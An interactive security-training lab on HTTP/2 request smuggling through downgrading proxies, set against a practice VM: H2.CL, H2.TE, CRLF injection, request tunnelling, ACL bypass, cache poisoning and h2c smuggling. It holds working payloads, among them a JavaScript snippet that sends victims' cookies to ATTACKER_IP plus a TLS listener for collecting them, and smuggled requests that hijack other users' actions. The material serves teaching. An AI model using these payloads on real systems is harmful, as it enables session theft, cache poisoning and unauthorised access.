
HTTP/2 Request Smuggling

Exploit HTTP Request Smuggling in HTTP/2 environments.

hard

45 min


Task 1: Introduction

In this room, we'll look at ways to smuggle requests through proxies that use HTTP/2. Even though HTTP/2 was designed to prevent request smuggling, we'll show how, in certain specific scenarios, requests can still be smuggled, sometimes even more easily than before.

Learning Objectives

  • Understand the basics of HTTP/2.
  • Learn how to exploit HTTP request smuggling via HTTP/2.
  • Use tools to detect/exploit said vulnerabilities.

Room Prerequisites

Before attempting this room, you must complete the HTTP Request Smuggling room. You must also be comfortable using proxies like Burp or ZAP.

Starting the VM

You will need to deploy the VM attached to this task by pressing the green Start Machine button at the top of the task. The machine will deploy all the required scenarios to complete the room. Each task that requires you to complete a practical element will point you to the URL of the web application you will need. You may access the VM using the AttackBox or your VPN connection.

Answer the questions below
Deploy the VM before continuing.

HTTP/2

The second version of the HTTP protocol proposes several changes over the original HTTP specifications. The new protocol intends to overcome the problems inherent to HTTP/1.1 by changing the message format and how the client and server communicate. One of the significant differences is that HTTP/2 requests and responses use a completely binary protocol, unlike HTTP/1.1, which is human-readable. This is a massive improvement over the older version since it allows any binary information to be sent in a way that is easier for machines to parse without making mistakes.

While the HTTP/2 binary format is difficult to read for humans, we will use a simplified representation of requests throughout the room. Here's a visual representation of HTTP/2 requests compared with an HTTP/1.1 request:

HTTP 2 Request Structure

The HTTP/2 request has the following components:

  • Pseudo-headers: HTTP/2 defines some headers that start with a colon :. Those headers are the minimum required for a valid HTTP/2 request. In our image above, we can see the :method, :path, :scheme and :authority pseudo-headers.
  • Headers: After the pseudo-headers, we have regular headers like user-agent and content-length. Note that HTTP/2 uses lowercase for header names.
  • Request Body: Like in HTTP/1.1, this contains any additional information sent with the request, like POST parameters, uploaded files and other data.
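To make the simplified representation concrete, here's a hedged sketch of how a basic HTTP/2 request will be drawn throughout the room (the host, path and values are purely illustrative):

:method: POST
:path: /login
:scheme: https
:authority: example.com
user-agent: Mozilla/5.0
content-length: 29

username=admin&password=admin

The pseudo-headers come first, followed by the regular lowercase headers, and finally the request body.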

Another important change in the structure of a request that may not be obvious is that HTTP/2 establishes precise boundaries for each part of a request or response. Instead of depending on specific characters like \r\n to separate headers, or : to separate a header name from its value, as HTTP/1.1 does, HTTP/2 adds fields to track the size of each part of a request (or response). More on this later.

Request Smuggling and HTTP/2

One of the main reasons HTTP request smuggling is possible in HTTP/1 scenarios is the existence of several ways to define the size of a request body. This ambiguity in the protocol leads to different proxies having their own interpretation of where a request ends and the next one begins, ultimately ending in request smuggling scenarios.

The second version of the HTTP protocol was built to improve on many of the characteristics of the first version. The one we most notably care about in the context of HTTP request smuggling is the clear definition of sizes for each component of an HTTP request. To avoid the ambiguities in HTTP/1, HTTP/2 prefixes each request component with a field that contains its size. For example, each header is prefixed with its size, so parsers know precisely how much information to expect. To understand this better, let's take a look at a captured request in Wireshark, looking specifically at the request headers:

HTTP 2 Binary Format

In the image, we are looking at the :method pseudo-header. As we can see, both the header name and value are prefixed with their corresponding lengths. The header name has a length of 7, corresponding to :method, and the header value has a length of 3, corresponding to the string GET.

The request's body also includes a length indicator, rendering headers like Content-Length and Transfer-Encoding: chunked meaningless in pure HTTP/2 environments.

Note: Even though Content-Length headers aren't directly used by HTTP/2, modern browsers will still include them for a specific scenario where HTTP downgrades may occur. This is very important for our specific scenario and we will discuss it in more detail in the following tasks.

With such clear boundaries for each part of a request, one would expect request smuggling to be impossible, and to a certain extent, it is in implementations that rely solely on HTTP/2. However, as with any new protocol version, not all devices can be upgraded to it directly. This results in implementations of load balancers or reverse proxies that support HTTP/2, serving content from server farms that still use HTTP/1.

Answer the questions below
Which version of the HTTP protocol uses \r\n to separate headers in a request?

Which version of the HTTP protocol uses a binary format and clearly defines boundaries for elements in requests/responses?

HTTP/2 Downgrading

When a reverse proxy serves content to the end user with HTTP/2 (frontend connection) but requests it from the backend servers by using HTTP/1.1 (backend connection), we talk about HTTP/2 downgrading. This type of implementation is still common nowadays, making it possible to reintroduce HTTP request smuggling in the context of HTTP/2, but only where downgrades to HTTP/1.1 occur.

HTTP 2 Downgrading

Instead of dealing directly with HTTP/2, we send HTTP/2 requests in the frontend connection to influence the corresponding HTTP/1.1 request generated in the backend connection so that it causes an HTTP desync condition. 

Ideally, the proxy should safely convert a single HTTP/2 request into a single equivalent HTTP/1.1 request. In practice, this is not always the case. Each proxy implementation may handle the conversion slightly differently, making it possible to introduce a malicious HTTP/1.1 request into the backend connection, leading to any of the typical cases of HTTP desync.

The Expected Behaviour

Before getting into request smuggling, let's understand how a request would be translated from HTTP/2 to HTTP/1.1. Take the following POST request as an example:

How HTTP 2 Downgrading Works

The process is straightforward. The headers and the body from the HTTP/2 request are directly passed into the HTTP/1.1 request. Notice that the HTTP/2 request includes a content-length header. Remember that HTTP/2 doesn't use such a header, but HTTP/1.1 requires one to delimit the request body correctly, so any decent browser will include content-length in HTTP/2 requests to preemptively deal with HTTP downgrades. In the case of the proxies we will be using, the Host header is added after all the other headers, based on the content of the :authority pseudo-header. Other proxy implementations may place the Host header before the rest of the custom headers.
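As a hedged illustration, the HTTP/2 example request sketched earlier would be rewritten by such a proxy roughly as follows (values are still illustrative):

POST /login HTTP/1.1
User-Agent: Mozilla/5.0
Content-Length: 29
Host: example.com

username=admin&password=admin

Note how the Host header is generated from the :authority pseudo-header and, for the proxies used in this room, appended after the client-supplied headers.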

H2.CL

As mentioned before, the Content-Length header has no meaning for HTTP/2, since the length of the request body is specified unambiguously. But nothing stops us from adding a Content-Length header to an HTTP/2 request. If HTTP downgrades occur, the proxy will pass the added content-length header from HTTP/2 to the HTTP/1.1 connection, enabling a desync. To better understand this, consider what would happen with the following HTTP/2 request:

H2.CL Case

The proxy receives the HTTP/2 request on the frontend connection. When translating the request to HTTP/1.1, it simply passes the Content-Length header to the backend connection. When the backend web server reads the request, it acknowledges the injected Content-Length as valid. Since the injected Content-Length in our example is 0, the backend is tricked into believing this is a POST request without a body. Whatever comes after the headers (the original body of the HTTP/2 request) will be interpreted as the start of a new request. Since the word HELLO is not a complete HTTP/1.1 request, the backend server will wait until more data arrives to complete it.
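A hedged sketch of this situation (the host and path are illustrative) would be an HTTP/2 request like the following:

:method: POST
:path: /
:scheme: https
:authority: example.com
content-length: 0

HELLO

After the downgrade, the backend reads something like this, with HELLO left over in the connection as the supposed start of a new request:

POST / HTTP/1.1
Content-Length: 0
Host: example.com

HELLO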

The backend connection is now desynced. If another user sends a request right after, it will be concatenated to the HELLO value lingering in the backend connection. Here's what would happen:

H2.CL Victim

Note how the request line of the following request gets merged with the lingering HELLO. This effectively alters the request of the victim user, which can be abused by the attacker in many ways we'll cover later.

H2.TE

We can also add a "Transfer-Encoding: chunked" header to the frontend HTTP/2 request, and the proxy might also pass it to the backend HTTP/1.1 connection untouched. If the backend web server prioritises this header to determine the request body size, we can desync the backend connection once again. Here's how our HTTP/2 request would look:

H2.TE Case

The effect would be the same as with the H2.CL case. The first request is now a chunked request. The first chunk is of size 0, so the backend believes that's where it ends. The rest of the HTTP/2 request body will poison the backend connection, affecting the next upcoming request.
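A hedged sketch of such a request (host, path and values are illustrative):

:method: POST
:path: /
:scheme: https
:authority: example.com
transfer-encoding: chunked

0

HELLO

After the downgrade, the backend reads the chunked body, sees the terminating 0-sized chunk, and leaves HELLO queued in the backend connection.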

CRLF injection

CRLF is the shorthand notation for a newline. CR stands for Carriage Return, equivalent to the character with ASCII code point 0xD, also represented as the \r character. LF stands for Line Feed, the ASCII character with code point 0xA, often represented as \n. CRLF is simply the sequence of both those characters \r\n, one after the other, and is used in HTTP/1.1 as a delimiter between headers, and also to separate the headers from the body (by using a double \r\n).

Since HTTP/2 packets can handle binary information, inserting any character in any request field is possible. This poses a problem when translating requests to HTTP/1.1, as some characters like \r\n act as delimiters between headers. If we can inject \r\n into an HTTP/2 header, it might get copied by the proxy directly into the HTTP/1.1 request, where it will be interpreted as a header separator, thus allowing us to smuggle requests.

To understand this, look at what would happen if we send the following HTTP/2 request:

CRLF Injection

The resulting HTTP/1.1 request now has an additional header. Note that we aren't limited to injecting headers; we can also smuggle entire requests in this way.
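As a hedged illustration (the foo header, the /smuggled path and all values are made up), consider an HTTP/2 header whose value embeds raw CRLFs, written out here as \r\n:

foo: bar\r\nContent-Length: 0\r\n\r\nGET /smuggled HTTP/1.1\r\nX: x

If the proxy copies this value verbatim while downgrading, the backend ends up reading something like two requests instead of one:

POST / HTTP/1.1
Foo: bar
Content-Length: 0

GET /smuggled HTTP/1.1
X: x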

CRLF injection is not restricted to HTTP/2 headers only. Any place where you can send a \r\n that ends up in the HTTP/1.1 request could potentially achieve the same results. Note that each proxy will try to sanitise requests differently, so your mileage may vary depending on your target.

Practical Example

In this example, we will exploit an H2.CL vulnerability in an old version of the Varnish proxy. In this lab, the proxy uses a single backend connection to handle the incoming requests of all users, so we can use the H2.CL vulnerability to interfere with other users' requests.

The application can be accessed via https://MACHINE_IP:8000/ and simulates an extremely simple social network. In this case, you can see your own posts (a single one) and like and dislike them. We will use the H2.CL vulnerability to force other users to like our post (the lab simulates a victim user).

First, let's analyse how the application works. By simple inspection, we can find out two important things:

  1. The application stores a sessid cookie in your browser with your assigned username to track your identity.
  2. To like a post, a GET request is sent to /post/like/<post_id>, where post_id is the id of the post we want to like. We can safely guess that the application will identify which user likes the post from the sessid cookie.

To force other users to like our post, we can send the following POST request:

Forcing a like

Notice we are using the POST method for the HTTP/2 request, because we want to send a request with a body. Since we set the content-length to 0, the backend will think the POST request has no body, and whatever comes next will be interpreted as a separate request (smuggled).
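For reference, here's a hedged text rendering of the attack request (the path of the outer request is illustrative; the post id is the one from this example):

POST / HTTP/2
Host: MACHINE_IP:8000
Content-Length: 0

GET /post/like/12315198742342 HTTP/1.1
X: f

Note that the X: f line is deliberately left without a trailing newline.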

We are smuggling an incomplete GET request to /post/like/12315198742342. This request corresponds to giving a like to our post. Since the request is unfinished, the backend server will wait for more data in the backend connection to complete it. If another user were to send a request to the website right after that (to any URL), their request would be appended to our incomplete request. As a result, the backend server would receive a request like the following:

Victim Unknowingly Liking a Post

Notice how the request of our victim becomes a request to like our post. The original URL requested by the victim is ignored since it became part of the X: header we injected in the smuggled request. As a result, the backend server will process a like to our post but with the victim's cookies.
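A hedged sketch of the merged request the backend might see (the victim's path and session value are illustrative):

GET /post/like/12315198742342 HTTP/1.1
X: fGET / HTTP/1.1
Host: MACHINE_IP:8000
Cookie: sessid=<victim's session>

The rest of the victim's headers follow, so the like is processed with the victim's identity.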

To get this working on Burp Suite, we would need to capture an HTTP/2 request to the site and use the Repeater to modify it until it looks like this:

Using Burp to Run the Exploit

Note: Be sure NOT to leave any additional newlines after the X: f header. If such newlines exist, the request line of the next incoming request won't be concatenated on the same line as our bogus header, making it a separate request altogether.

Be sure to check in the upper right corner that your repeated request is indeed an HTTP/2 request. Since our attack requires setting the Content-Length header to 0, we will also need to uncheck the "Update Content-Length" setting of the Repeater. Otherwise, Repeater will calculate the correct Content-Length depending on the size of the request body.

Disabling Update Content-Length

Once you have sent your payload, allow up to 30 seconds for the victim user to send a request. You may need to attempt the attack a couple of times to catch the user's request in time. Make sure not to send any requests during the 30 seconds after poisoning the backend connection, as doing so would make you trigger the payload yourself.

If all went well, you should now have a like from the victim user.

Answer the questions below
Repeat the request shown in the practical example against the app and wait for a user to fall for our trap. What is the username of the victim user who liked our post?

Request Tunneling vs Desync

So far, the attack vectors we have looked at depend on a single backend HTTP connection being reused to serve all users. In certain proxy implementations, each user gets their own backend connection, separating their requests from those of other users. Whenever this happens, an attacker won't be able to influence the requests of other users. At first sight, it would appear that we can't do much if confined to our own connection, but we can still smuggle requests through the frontend proxy and achieve some results. Since we can only smuggle requests into our own connection, this scenario is often called request tunnelling.

Per-user backend connections

In the following three tasks, we will use an old version of HAProxy, vulnerable to CVE-2019-19330 as our frontend proxy. This version allows request smuggling by using the CRLF injection technique. The vulnerable backend application will be accessible through the proxy at https://MACHINE_IP:8100.

Answer the questions below
Click and continue learning!

Leaking Internal Headers

The simplest way to abuse request tunnelling is to get some information on how the backend requests look. In some scenarios, the frontend proxies may add headers to the requests before sending them to the backend. If we want to smuggle a specific request to the backend, we may need to add such headers for the request to go through.

To leak such headers, we can abuse any functionality in the backend application that reflects a parameter from the request into the response. In our case, the application reflects whatever data is sent to /hello through the q POST parameter. Here's how the request would look:

Search Engine Request

Notice that a content-length header is present even though HTTP/2 ignores it. Most browsers will add this header to all HTTP/2 requests so that the backend will still receive a valid Content-Length header if an HTTP downgrade occurs. In the backend, the request would be converted into HTTP/1.1. This particular proxy will insert the Host: header after the headers sent by the client (right after content-length). If needed, the proxy could also add any additional headers (represented as X-Internal in the image). The final backend request would look like this:

Search Engine HTTP 1.1 Request

We will take advantage of the vulnerability in HAProxy that allows us to inject CRLFs via headers to leak the backend headers successfully. We will add a custom Foo header and send our attack payload through it. This is how our request would look:

Abusing CRLF Injection to Leak Internal Headers

There's quite a bit to unpack here:

  • This will be a normal request for the frontend since HTTP/2 doesn't care about binary information in its headers.
  • The Content-Length: 0 header injected through the Foo header will make the backend think the first POST request has no body. Whatever comes after the headers will be interpreted as a second request.
  • Since the Host header and any other internal headers are inserted by the proxy after Foo, the first POST request will have no Host header unless we provide one. This is why we injected a Host header for the first request. This is required, as the HTTP/1.1 specification requires a Host header for each request.
  • The second POST request will trigger a search on the website. Notice how the internal headers are now part of the q parameter in the body of the request. This will cause the website to reflect the headers back to us.
  • The second POST request we have injected has a Content-Length: 300. This number is just an initial guess of how much space we will require for the Internal headers. You will need to play a bit with it until you get the right answer. If it's set too high, the connection will hang as the backend waits for that many bytes to be transferred. If you set it too low, you may only get a part of the internal headers.
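Putting these points together, a hedged reconstruction of the value we will place inside the Foo header could look like this (every line break inside the value is a CRLF, Content-Length: 300 is the initial guess discussed above, and the exact payload shown in the lab's screenshots may differ slightly):

bar
Host: MACHINE_IP:8100
Content-Length: 0

POST /hello HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

q=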

Now let's try sending this using Burp. First, capture the request that is sent by the website when performing a search. You should be able to identify a POST request being sent to /hello. Right-click the request and send it to Repeater:

Sending request to repeater

Note: Be sure to send an HTTP/2 request to repeater. Under certain circumstances, your browser may send an HTTP/1.1 request the first time you request a resource. In that case, simply refresh the website, and it should send an HTTP/2 request the second time.

Once our request is in the Repeater tab, we'll do two modifications to it:

  1. Delete the body content.
  2. Set the Content-Length header to 0. We do this for the same reason as before. We want the first request to be a POST with no body. Remember we will need to disable the Update Content-Length setting on Repeater to avoid Burp overwriting our custom value.

Deleting request body

If Burp is giving you a hard time with the above steps, here's a simplified version of the same modified request that you can copy directly into Repeater instead to continue:

POST /hello HTTP/2
Host: MACHINE_IP:8100
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Let's add our custom Foo header with an initial content of bar. Notice that Burp allows us to edit the HTTP/2 request as if it were an HTTP/1 request. This is somewhat convenient as long as you don't need to insert binary characters in the request. Since we will be adding CRLFs to the request, editing the request as text won't be possible. Instead, we will use the Inspector pane on the right, since it allows much more precise editing of the request:

Adding a custom header to the request

Let's click the arrow beside the foo header in the Inspector and edit it to our desired value. Note that to insert a CRLF in the header value, you will need to press SHIFT + ENTER. The final result should look like this:

Kettled request

Once you press the Apply changes button, the Request pane will go blank and show a message indicating the request is "kettled". This means there's no longer any way to represent the request as pure text because of the special characters it contains (CRLFs in our case). From now on, all modifications to the request must be done through the Inspector.

When the request is ready, you can press the Send button as usual to send it. Remember that our HTTP/2 request will be split into two backend requests, so the first time you send it, you will only obtain the response of the first request, which is empty. To get the value of the hidden internal headers, you will need to send the same request twice in quick succession. If all goes well, the website should reflect the internal headers to you on the second request:

Leaked headers shown as search result

Note: The lab is configured to drop the backend connections after 10 seconds of inactivity, so if you are getting weird responses from the server, chances are that you have poisoned the connection with an incorrect request. Just wait 10 seconds and try again.

Answer the questions below
What's the value of the leaked internal header?

Bypassing Frontend Restrictions

In some scenarios, you will find that the frontend proxy enforces restrictions on what resources can be accessed on the backend website. For example, imagine your website has an admin panel at /admin, but you don't want it accessible to everyone on the Internet. As a simple solution, you could enforce a restriction in the frontend proxy to disallow any attempt to access /admin without requiring any changes in the backend server itself.

If we try to access https://MACHINE_IP:8100/admin, we'll get a message telling us the request has been denied.

Admin resource forbidden 

A request tunnelling vulnerability would allow us to smuggle a request to the backend without the frontend proxy noticing, effectively bypassing frontend security controls. Consider the following HTTP/2 request:

Smuggling a request to admin

Note: We are using a POST request for this scenario. While this is not strictly required for the attack to work, there's a fundamental difference in how GET and POST requests are treated by a proxy. If a proxy implements caching, a GET request may be served from the proxy's cache, so nothing will be forwarded to the backend server and the attack may fail. A POST request, on the other hand, is normally not served from cache, so it is guaranteed to be forwarded to the backend.

When the frontend sees this HTTP/2 request, it will interpret it as being directed to /hello, which is allowed by the proxy's ACL. In the backend, however, the HTTP/2 request gets split into two HTTP/1.1 requests, where the second one points to /admin. Notice the second request is purposefully unfinished, so we will need to send the request twice to trigger the response corresponding to /admin.

Another way to understand the attack would be to say that we are using an allowed resource, in this case /hello, to smuggle a request to a forbidden resource, in this case /admin. From the point of view of the proxy, only a request for /hello was made, so no ACL violations occurred. It is important to note that the resource we request via HTTP/2 must be allowed by the ACL for this attack to work. We are effectively smuggling an invalid request over a valid one. The same method can sometimes be used to smuggle requests past Web Application Firewalls (WAFs).
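As a hedged sketch (the Foo header and the exact header placement are illustrative), the backend could end up seeing something like this after the downgrade:

POST /hello HTTP/1.1
Host: MACHINE_IP:8100
Foo: bar
Content-Length: 0

GET /admin HTTP/1.1

The smuggled GET is deliberately left without its terminating blank line, which is why the /admin response only comes back when the payload is sent a second time.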

Launching the Attack With Burp

You can start by capturing a request to /hello and sending it to the Repeater. From there, you should be able to adjust the request to implement the attack described in this task. Remember to make sure you captured an HTTP/2 request, as your browser may send an HTTP/1.1 request the first time.

If Burp is giving you a hard time capturing the right request, here's a text version of the base request you'll need to modify. You can copy it directly into a new Repeater tab and work your way from there:

POST /hello HTTP/2
Host: MACHINE_IP:8100
User-Agent: Mozilla/5.0
Foo: bar

Remember that once you insert binary data into the Foo header, Burp will go into kettled mode, so any edits to the request will need to be done from the Inspector tab.

Answer the questions below

What is the value of the flag in /admin?

Web Cache Poisoning

Even if we can't influence other users' connections directly, we may be able to use request tunnelling to poison server-side caching mechanisms, affecting users indirectly. This kind of attack has a high severity as it impacts all users visiting the website for as long as the cached content lasts. Given the right conditions, the poisoned cached content can contain anything the attacker wants, including JavaScript payloads. This can be used to issue malicious redirects or even steal user sessions.

Note: Extreme care needs to be taken when testing web cache poisoning in real-world production systems, as it may affect the availability of the website if not conducted properly.

Understanding the Scenario

For this task, we are still using HAProxy. The HAProxy instance is configured to cache content for 30 seconds, so we should be able to perform the attack. Also, if something gets cached wrongly while you are doing your tests, waiting for 30 seconds will clear up the cache so you can start from scratch once again.

Before diving into details, let's lay out the plan. To achieve cache poisoning, we want to make a request to the proxy for /page1 and somehow force the backend web server to respond with the contents of /page2. If this were to happen, the proxy would wrongly associate the URL of /page1 with the cached content of /page2.

The trick we are using would allow us to poison the cache, but only with the content of other pages on the same website. This means the attacker wouldn't be able to pick arbitrary content for the cache poisoning. Luckily for us, there are some ways to overcome this limitation:

  1. If the website has an upload functionality.
  2. If we find a part of the website that reflects content from a request parameter. We can also abuse articles or any other content we can add to the website (think of a blog).
  3. Under certain circumstances, open redirects can also be abused, but we won't cover this case during the room.

In any of those cases, the attacker can add arbitrary content to the website, which can be cached by the proxy and associated with any URL (existing or not). In the case of our application, we have an upload functionality at our disposal (https://MACHINE_IP:8100/upload). We can use it to upload any payload we want cached later.

File Uploads

Executing the Plan

Our goal in this task will be to steal cookies from any user visiting https://MACHINE_IP:8100/. The lab already simulates a victim user, and the flag for this task is in that user's cookies.

One option would be to poison the cache for / directly, but we want to be a bit stealthier about things. By quick inspection, we can notice that / executes the showText() JavaScript function when the page's body loads, which is defined in /static/text.js.

Analysing the javascript loaded by the website

Let's try to poison the cached version of /static/text.js to include a javascript payload to steal the cookies from the user.

Since we need the javascript payload to be on the website before the cache poisoning, let's start by uploading the following payload in a file named myjs.js:

var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
       document.getElementById("demo").innerHTML = xhttp.responseText;
    }
};
xhttp.open("GET", "https://ATTACKER_IP:8002/?c="+document.cookie, true);
xhttp.send();

This is a simple payload that will forward the victim's cookies back to a web server controlled by the attacker. Be sure to replace ATTACKER_IP with the IP address of your AttackBox. The only special thing about this payload is that it forwards the cookie via https. We need to use https, since HTTP/2 runs over https by default. If a script in an https website tried to load a resource using plaintext http, most browsers would block the action for security reasons. This means your standard python http server won't actually be able to receive the cookies, but more on that later.

After uploading our payload, the website will let us know that the file has been saved to /static/uploads/myjs.js. We now need to poison the cache so that it serves our payload whenever /static/text.js is requested. To do so, we will use the following request:

HTTP request splitting to poison the cache

Here, we are reusing the CRLF injection vulnerability in HAProxy to perform a request splitting attack against the backend. The first backend request will get the contents of /static/text.js. The second request will be for /static/uploads/myjs.js. The proxy expects a single response to its request but gets two instead. It will take the first response and serve it to the user, keeping the second response queued in the backend connection.

Note that we included the Pragma: no-cache header in our request to force the proxy to bypass any cached content and send the request to the backend server. Doing so allows us to send several requests until our payload is correctly triggered without waiting for the cache to time out.
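A hedged sketch of the two backend requests produced by the split (the Foo header and exact header placement are illustrative):

GET /static/text.js HTTP/1.1
Foo: bar
Pragma: no-cache
Host: MACHINE_IP:8100

GET /static/uploads/myjs.js HTTP/1.1
Host: MACHINE_IP:8100

The backend answers both: the proxy serves the first response to us, and the second response stays queued in the backend connection.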

If we now send an additional request for /static/text.js, we will get the queued response with the contents of myjs.js. Beyond the fact that we are receiving the wrong content for our new request, the cache will wrongly associate the contents of the queued response with the new URL we are requesting. Any other user that requests /static/text.js afterwards will receive the contents of myjs.js served from the poisoned cache instead. This will last until the cached content expires, which is just 30 seconds in our lab.

Poisoning the cache by desyncing the backend connection

If your attack worked, you should now be able to use curl to request /static/text.js and get the contents of our payload instead. The following command allows you to check:

AttackBox
user@attackbox$ curl -kv https://MACHINE_IP:8100/static/text.js
        

Note: Don't use your actual browser (Firefox, Chrome, Safari, etc.) to check if the attack worked. Modern browsers also have local caching, which may alter what you get from a URL, as it may be served directly from your local cache instead of being requested from the proxy/web server.

Receiving the Flag

At this point, if the victim user navigates to /, their cookies will be sent to our AttackBox on port 8002 via https. We need to set up a simple web server that implements https to be able to read the received cookies. There are many ways to set up such a server; we will use Python to do so. Before running the https web server, we will need to create an SSL certificate and key with the following command:

AttackBox
user@attackbox$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"
        

Next, we'll create a file named https.py with the code responsible for running the https web server. The code is straightforward and lets you specify the port to use, which is 8002 in our case. The code also points to the SSL certificate and key we previously generated, and expects both of those files to be in the same directory as the Python script:

from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

# Listen on all interfaces on port 8002. BaseHTTPRequestHandler replies 501 to every
# method, but it still logs each request line (including the ?c=<cookie> query string).
httpd = HTTPServer(('0.0.0.0', 8002), BaseHTTPRequestHandler)

# Wrap the listening socket with TLS using the certificate and key generated earlier
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='cert.pem', keyfile='key.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)

httpd.serve_forever()

Once our script is ready, we can run it with the following command. You won't get any output initially, but as soon as the victim navigates to your webserver, logs will start to appear:

AttackBox
user@attackbox$ python3 https.py
        

The victim should visit / every 20 seconds, so you should get the flag quickly. If for some reason you aren't receiving it, remember the proxy's cache is set to last for 30 seconds only, so you may need to poison the cache again.

Answer the questions below
What is the value of the cookie stolen using web cache poisoning?

HTTP Version Negotiation

Web servers can offer the client many HTTP protocol versions in a single port. This is useful since you can't guarantee that users will have an HTTP/2-compliant browser. In this way, the server can offer the client both HTTP/1.1 and HTTP/2, and the client can select the version they want to use. This process is known as negotiation and is handled entirely by your browser. 

The original HTTP/2 specification defined two ways to negotiate HTTP/2, depending on whether the communications were encrypted or not. The two methods used the following protocol identifiers:

  • h2: Protocol used when running HTTP/2 over a TLS-encrypted channel. It relies on the Application Layer Protocol Negotiation (ALPN) mechanism of TLS to offer HTTP/2.
  • h2c: HTTP/2 over cleartext channels. This would be used when encryption is not available. Since ALPN is a feature of TLS, you can't use it in cleartext channels. In this case, the client sends an initial HTTP/1.1 request with a couple of added headers to request an upgrade to HTTP/2. If the server acknowledges the additional headers, the connection is upgraded to HTTP/2.

The h2 protocol is the usual way to implement HTTP/2 since it is considered more secure. In fact, the h2c specification is now regarded as obsolete to the point where most modern browsers don't even support it. Many server implementations, however, still support h2c for compatibility reasons, enabling a different way to smuggle requests.

h2c Upgrades

When negotiating a cleartext HTTP/2 connection, the client will send a regular HTTP/1.1 request with the Upgrade: h2c header to let the server know it supports h2c. The request must also include an additional HTTP2-Settings header with some negotiation parameters that we won't discuss in detail. A compliant server will accept the upgrade with a 101 Switching Protocols response. From that point, the connection switches to HTTP/2.
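A hedged sketch of the exchange (the Host is illustrative, and the HTTP2-Settings value is just a placeholder for the base64url-encoded settings):

GET / HTTP/1.1
Host: example.com
Connection: Upgrade, HTTP2-Settings
Upgrade: h2c
HTTP2-Settings: <base64url-encoded settings>

HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: h2c

After the 101 response, both sides keep using the same connection but speak HTTP/2 from that point on.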

h2c upgrade process

Tunneling Requests via h2c Smuggling

When an HTTP/1.1 connection upgrade is attempted through some reverse proxies, they will forward the upgrade headers directly to the backend server instead of handling the upgrade themselves. The backend server will perform the upgrade and manage communications in the new protocol afterwards. The proxy will tunnel any further communications between client and server but won't check their contents anymore, since it assumes the protocol changed to something other than HTTP.

Tunneling requests via h2c smuggling

Since connections in HTTP/2 are persistent by default, we should be able to send other HTTP/2 requests, which will now go directly to the backend server through the HTTP/2 tunnel. This technique is known as h2c smuggling.

Note that for h2c smuggling to work, the proxy must forward the h2c upgrade to the backend. Some proxies are aware of h2c and could try to handle the connection upgrade themselves. In those cases, we would end up with a frontend connection upgraded to HTTP/2 instead of a direct tunnel to the backend, which wouldn't be of much use.

When facing an h2c-aware proxy, there's still a chance to get h2c smuggling to work under a specific scenario. If the frontend proxy supports HTTP/1.1 over TLS, we can try performing the h2c upgrade over the TLS channel. This is an unusual request, since h2c is defined to work under cleartext channels only. The proxy may just forward the upgrade headers instead of handling the upgrade directly, as it wouldn't make sense to have h2c over an encrypted channel according to the specification.

Note that h2c smuggling only allows for request tunnelling. Poisoning other users' connections won't be possible. But as we have already shown, this could still be abused to bypass restrictions on the frontend or even attempt cache poisoning.

Bypassing Frontend Restrictions With h2csmuggler

For this scenario, you will be attacking the application exposed at https://MACHINE_IP:8200. The application is served through an HAProxy instance with a default configuration. The application exposes two endpoints:

  1. The / endpoint contains a simple website and is allowed through the proxy.
  2. The /private endpoint is not allowed through the proxy. You can try accessing it at https://MACHINE_IP:8200/private and you should get a 403 Forbidden response.

Our objective will be to use h2c smuggling to get the contents of /private through the proxy. We will use the h2csmuggler tool provided by BishopFox to do so. The tool will perform the full attack for us since doing it manually would be somewhat complicated.

The following command would first attempt an h2c upgrade while requesting /. Since that resource is allowed by the proxy, the connection will upgrade successfully to HTTP/2. The HTTP/2 tunnel would then be used to request /private, bypassing the frontend restrictions:

AttackBox
user@attackbox$ python3 h2csmuggler.py -x https://MACHINE_IP:8200/ https://MACHINE_IP:8200/private
        

Note that you may need to run the command a couple of times if it fails.

Answer the questions below
What's the value of the flag on /private?

In this room, we've covered multiple ways an attacker can use HTTP/2 to smuggle requests through reverse proxies. These methods aren't really about flaws in HTTP/2 itself, but about how HTTP/2 is used in mixed environments where HTTP/1.1 is still needed. As with conventional HTTP request smuggling attacks, the impact ranges from bypassing proxy-enforced ACLs to stealing user information or even poisoning caches that serve all users.

We have shown some basic examples of what can be achieved from an attacker's standpoint, but there's much more to explore. For more information on the subjects covered in this room, be sure to read the original research in the following links:

Answer the questions below
Click and continue learning!
